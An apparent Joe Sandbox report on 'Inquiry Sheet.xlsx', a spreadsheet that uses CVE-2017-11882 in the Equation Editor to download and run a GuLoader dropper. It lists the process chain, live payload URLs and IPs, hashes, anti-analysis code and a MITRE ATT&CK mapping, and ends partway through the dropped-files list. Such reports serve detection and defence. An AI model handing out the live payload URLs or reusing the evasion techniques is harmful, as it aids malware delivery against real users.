
Windows Analysis Report Inquiry Sheet.xlsx

Overview

General Information

Sample Name: Inquiry Sheet.xlsx
Analysis ID: 482488
MD5: b079763f132db9b4d979256a28909892
SHA1: 3f8ef9821671cbc8267baa2c6e9a41a18af45f78
SHA256: 71db7caab688d41a1c6bca4cafbf782d50a670a7c7e73ad3000dea754959cf2e
Tags: VelvetSweatshop, xlsx

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1296 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1532 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2604 cmdline: 'C:\Users\Public\vbc.exe' MD5: B7E5ACDADE5630DBF1AB4B211DDC16DB)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://37.0.11.217/WEALTHYREM_ecI"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection | Author: Joe Security | Data: DestinationIp: 212.192.246.25, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1532, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1532, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1532, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2604
Sigma detected: Execution from Suspicious Folder
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1532, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2604

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp | Malware Configuration Extractor: GuLoader {"Payload URL": "http://37.0.11.217/WEALTHYREM_ecI"}
Multi AV Scanner detection for submitted file
Source: Inquiry Sheet.xlsx | ReversingLabs: Detection: 26%
Antivirus detection for URL or domain
Source: http://212.192.246.25/excel/vbc.exe | Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | ReversingLabs: Detection: 17%
Source: C:\Users\Public\vbc.exe | ReversingLabs: Detection: 17%
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 212.192.246.25:80
Source: excel.exe | Memory has grown: Private usage: 4MB later: 68MB

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: http://37.0.11.217/WEALTHYREM_ecI
Source: Joe Sandbox View | ASN Name: RHC-HOSTINGGB RHC-HOSTINGGB
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK
  Date: Mon, 13 Sep 2021 18:16:54 GMT
  Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
  Last-Modified: Sun, 12 Sep 2021 22:03:18 GMT
  ETag: "22000-5cbd38416fb31"
  Accept-Ranges: bytes
  Content-Length: 139264
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: application/x-msdownload
Source: global traffic | HTTP traffic detected: GET /excel/vbc.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 212.192.246.25
  Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 212.192.246.25
Source: vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com
Source: vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com/
Source: vbc.exe, 00000006.00000002.678573420.0000000003407000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.678573420.0000000003407000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000006.00000002.678573420.0000000003407000.00000002.00020000.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000006.00000002.678573420.0000000003407000.00000002.00020000.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: BEC4B86A.emf.0.dr | String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: vbc.exe, 00000006.00000002.678573420.0000000003407000.00000002.00020000.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BEC4B86A.emf

System Summary:

Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00326928 NtAllocateVirtualMemory,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_003269C1 NtAllocateVirtualMemory,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00326A91 NtAllocateVirtualMemory,
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00326B75 NtAllocateVirtualMemory,
Source: C:\Users\Public\vbc.exe | Process Stats: CPU usage > 98%
Source: vbc[1].exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Users\Public\vbc.exe | Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe | Memory allocated: 76E90000 page execute and read and write
Source: Inquiry Sheet.xlsx | ReversingLabs: Detection: 26%
Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\Public\vbc.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$Inquiry Sheet.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRE407.tmp
Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSX@4/27@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp | Binary or memory string: .VBPud<_
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Data Obfuscation:

Yara detected GuLoader
Source: Yara match | File source: 00000006.00000002.677886509.0000000000320000.00000040.00000001.sdmp, type: MEMORY
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00402B34 push esi; retn 000Ch
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00405C5A pushad ; iretd
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00407D62 push edi; iretd
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00408701 push esi; ret
Source: C:\Users\Public\vbc.exe | Code function: 6_2_0040631B push es; iretd
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00409134 push ebp; ret
Source: C:\Users\Public\vbc.exe | Code function: 6_2_004089D5 push eax; ret
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00405F90 push ds; retf
Source: C:\Users\Public\vbc.exe | Code function: 6_2_003242B8 pushad ; retf
Source: initial sample | Static PE information: section name: .text entropy: 7.07203430098
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 0000000000329831 second address: 0000000000329831 instructions: 0x00000000 rdtsc 0x00000002 mov eax, FCDACE93h 0x00000007 sub eax, 1A63DDA3h 0x0000000c xor eax, D5EBB4F5h 0x00000011 add eax, C862BBFCh 0x00000016 cpuid 0x00000018 jmp 00007F22F08EB422h 0x0000001a pushad 0x0000001b mov dx, C148h 0x0000001f cmp dx, C148h 0x00000024 jne 00007F22F08EA77Dh 0x0000002a popad 0x0000002b popad 0x0000002c call 00007F22F08EB3E8h 0x00000031 lfence 0x00000034 mov edx, CD724B6Dh 0x00000039 xor edx, AC8852AFh 0x0000003f xor edx, A3550569h 0x00000045 xor edx, BD511CBFh 0x0000004b mov edx, dword ptr [edx] 0x0000004d lfence 0x00000050 test edx, eax 0x00000052 cmp eax, edx 0x00000054 test eax, ecx 0x00000056 ret 0x00000057 sub edx, esi 0x00000059 ret 0x0000005a add edi, edx 0x0000005c dec dword ptr [ebp+000000F8h] 0x00000062 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000069 jne 00007F22F08EB3C9h 0x0000006b test dl, FFFFFFE1h 0x0000006e call 00007F22F08EB42Bh 0x00000073 call 00007F22F08EB45Ch 0x00000078 lfence 0x0000007b mov edx, CD724B6Dh 0x00000080 xor edx, AC8852AFh 0x00000086 xor edx, A3550569h 0x0000008c xor edx, BD511CBFh 0x00000092 mov edx, dword ptr [edx] 0x00000094 lfence 0x00000097 test edx, eax 0x00000099 cmp eax, edx 0x0000009b test eax, ecx 0x0000009d ret 0x0000009e mov esi, edx 0x000000a0 pushad 0x000000a1 rdtsc
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2832 | Thread sleep time: -300000s >= -30000s
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00329829 rdtsc
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00328C25 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe | Code function: 6_2_0032441B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe | Code function: 6_2_00326503 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe | Code function: 6_2_0032A24C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe | Code function: 6_2_003292EB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe | Code function: 6_2_0032A2D7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe | Code function: 6_2_003237A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: vbc.exe, 00000006.00000002.678140979.00000000008C0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.678140979.00000000008C0000.00000002.00020000.sdmp | Binary or memory string: !Progman
Source: vbc.exe, 00000006.00000002.678140979.00000000008C0000.00000002.00020000.sdmp | Binary or memory string: Program Manager<

    Mitre Att&ck Matrix

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Valid Accounts | Exploitation for Client Execution 12 | Path Interception | Process Injection 12 | Masquerading 111 | OS Credential Dumping | Security Software Discovery 21 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
    Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Extra Window Memory Injection 1 | Virtualization/Sandbox Evasion 1 | LSASS Memory | Virtualization/Sandbox Evasion 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 12 | Security Account Manager | Process Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 2 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 121 | SIM Card Swap | Carrier Billing Fraud | -
    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 1 | LSA Secrets | File and Directory Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | -
    Replication Through Removable Media | Launchd | Rc.common | Rc.common | Extra Window Memory Injection 1 | Cached Domain Credentials | System Information Discovery 12 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | -

    Numbers following a technique name are the counts attached to that technique in the original matrix; cells marked "-" were empty.

    Behavior Graph


    Screenshots


    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source | Detection | Scanner | Label
    Inquiry Sheet.xlsx | 27% | ReversingLabs | Document-OLE.Exploit.CVE-2017-11882

    Dropped Files

    Source | Detection | Scanner | Label
    C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML | -
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 100% | Joe Sandbox ML | -
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 18% | ReversingLabs | Win32.Trojan.Mucc
    C:\Users\Public\vbc.exe | 18% | ReversingLabs | Win32.Trojan.Mucc

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    Source | Detection | Scanner | Label
    http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
    http://212.192.246.25/excel/vbc.exe | 100% | Avira URL Cloud | malware
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
    http://37.0.11.217/WEALTHYREM_ecI | 0% | Avira URL Cloud | safe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    Name | Malicious | Antivirus Detection | Reputation
    http://212.192.246.25/excel/vbc.exe | true | Avira URL Cloud: malware | unknown
    http://37.0.11.217/WEALTHYREM_ecI | true | Avira URL Cloud: safe | unknown

    URLs from Memory and Binaries

    Name | Source | Malicious | Antivirus Detection | Reputation
    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | vbc.exe, 00000006.00000002.678573420.0000000003407000.00000002.00020000.sdmp | false | - | high
    http://www.windows.com/pctv. | vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp | false | - | high
    http://investor.msn.com | vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp | false | - | high
    http://www.msnbc.com/news/ticker.txt | vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp | false | - | high
    http://www.icra.org/vocabulary/. | vbc.exe, 00000006.00000002.678573420.0000000003407000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true | vbc.exe, 00000006.00000002.678573420.0000000003407000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
    http://www.hotmail.com/oe | vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp | false | - | high
    http://www.day.com/dam/1.0 | BEC4B86A.emf.0.dr | false | - | high
    http://investor.msn.com/ | vbc.exe, 00000006.00000002.678374726.0000000003220000.00000002.00020000.sdmp | false | - | high

                  Contacted IPs


                  Public

    IP | Domain | Country | ASN | ASN Name | Malicious
    212.192.246.25 | unknown | Russian Federation | 205220 | RHC-HOSTINGGB | true

                  General Information

                  Joe Sandbox Version:33.0.0 White Diamond
                  Analysis ID:482488
                  Start date:13.09.2021
                  Start time:20:15:41
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 5m 23s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:Inquiry Sheet.xlsx
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:7
                  Number of new started drivers analysed:2
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.expl.evad.winXLSX@4/27@0/1
                  EGA Information:Failed
                  HDC Information:
                  • Successful, ratio: 31.4% (good quality ratio 22.3%)
                  • Quality average: 46.5%
                  • Quality standard deviation: 35.9%
                  HCA Information:Failed
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .xlsx
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Scroll down
                  • Close Viewer
                  Warnings:
                  • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, WMIADAP.exe, svchost.exe
                  • TCP Packets have been reduced to 100
                  • Report size getting too big, too many NtCreateFile calls found.
                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                  • VT rate limit hit for: /opt/package/joesandbox/database/analysis/482488/sample/Inquiry Sheet.xlsx

                  Simulations

                  Behavior and APIs

    Time | Type | Description
    20:16:41 | API Interceptor | 34x Sleep call for process: EQNEDT32.EXE modified

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASN

    Match: RHC-HOSTINGGB

    Associated Sample Name / URL | Detection | Context
    01_extracted.exe | malicious | 212.192.246.191
    CHECKLIST INQ 1119.vbs | malicious | 212.192.246.191
    DOCU_SIGN8289292930001028839.PDF.exe | malicious | 212.192.246.165
    DOCU_SIGN8289292930001028838.PDF.exe | malicious | 212.192.246.165
    DOCU_SIGN8289292930001028838.PDF.exe | malicious | 212.192.246.165
    DOCU_SIGN8289292930001028838.PDF.exe | malicious | 212.192.246.165
    DOCU_SIGN8289292930001028838.PDF.exe | malicious | 212.192.246.165
    Ziraat Bankasi Swift Mesaji.exe | malicious | 212.192.246.176
    Ziraat Bankasi Swift Mesaji.exe | malicious | 212.192.246.176
    Ziraat Bankasi Swift Mesaji.exe | malicious | 212.192.246.176
    53t6VeSUO5.exe | malicious | 212.192.246.56
    1p34FDbhjW.exe | malicious | 212.192.246.176
    eli.exe | malicious | 212.192.246.242
    eli.exe | malicious | 212.192.246.242
    rfq-aug-09451.exe | malicious | 212.192.246.250
    Nd1eFNdNeE.exe | malicious | 212.192.246.73
    J5U0QK6IhH.exe | malicious | 212.192.246.147
    RF 2001466081776.doc | malicious | 212.192.246.147
    HalkbankEkstre1608219773667200308882717534.ex.exe | malicious | 212.192.246.93
    Inquiry.exe | malicious | 212.192.246.179

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:downloaded
                  Size (bytes):139264
                  Entropy (8bit):6.609176626733107
                  Encrypted:false
                  SSDEEP:1536:T8hQbCg3d/xOfo6dUoEiL7yQMLIn6Otq/CrAvI7S6mStD2arf6FRo6DomgJ:DGAZ6dNEc/MLo6Ot57S69D2aD6F5oj
                  MD5:B7E5ACDADE5630DBF1AB4B211DDC16DB
                  SHA1:EF39B9D9B31F61A538C79D06171B2F3FB62D3346
                  SHA-256:F16CD8C15E34505A4C72C77DF972264F67E97C2E0B79B205F82BB59F26C09998
                  SHA-512:61FA3478A69E18BF8024E656AB3C7334B96C94BA8A64E672596D77FE84F5E247508E13331DBE10D20488EDAEA7E0D976D8E5C1B27820AB4091F063E7833E05B9
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 18%
                  Reputation:low
                  IE Cache URL:http://212.192.246.25/excel/vbc.exe
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\13D19963.emf
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                  Category:dropped
                  Size (bytes):7788
                  Entropy (8bit):5.5366022587072345
                  Encrypted:false
                  SSDEEP:96:w0CblJaXn/08zDefAm/luoOHo6MiDbDda91RjTBbPxmPAWmOHX:wZTNAK4oOIGbK1RvVwPAWmOHX
                  MD5:F1E1ADDCD68163BF90F6BB1F51FBFEDF
                  SHA1:CDACDEC4E8E0EC2B60CB37585D156859AB6E6BD6
                  SHA-256:9BB4C7D9F2BECCEBD243C456185A0EE660A10248B91BDE9BAB8D8E9C5F7E66A6
                  SHA-512:CA37D803639C2DA62E113A6984E0A157094E51710A0302931F71A4A4B3DAFC1FB8786CCB86F2F0B7A156E1032BE49D7D5FCDE3B3CAD5A670A37376DB9A361AE1
                  Malicious:false
                  Reputation:low
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1C86035F.png
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                  Category:dropped
                  Size (bytes):49744
                  Entropy (8bit):7.99056926749243
                  Encrypted:true
                  SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                  MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                  SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                  SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                  SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2C6D05D4.png
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
                  Category:dropped
                  Size (bytes):6815
                  Entropy (8bit):7.871668067811304
                  Encrypted:false
                  SSDEEP:96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
                  MD5:E2267BEF7933F02C009EAEFC464EB83D
                  SHA1:ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
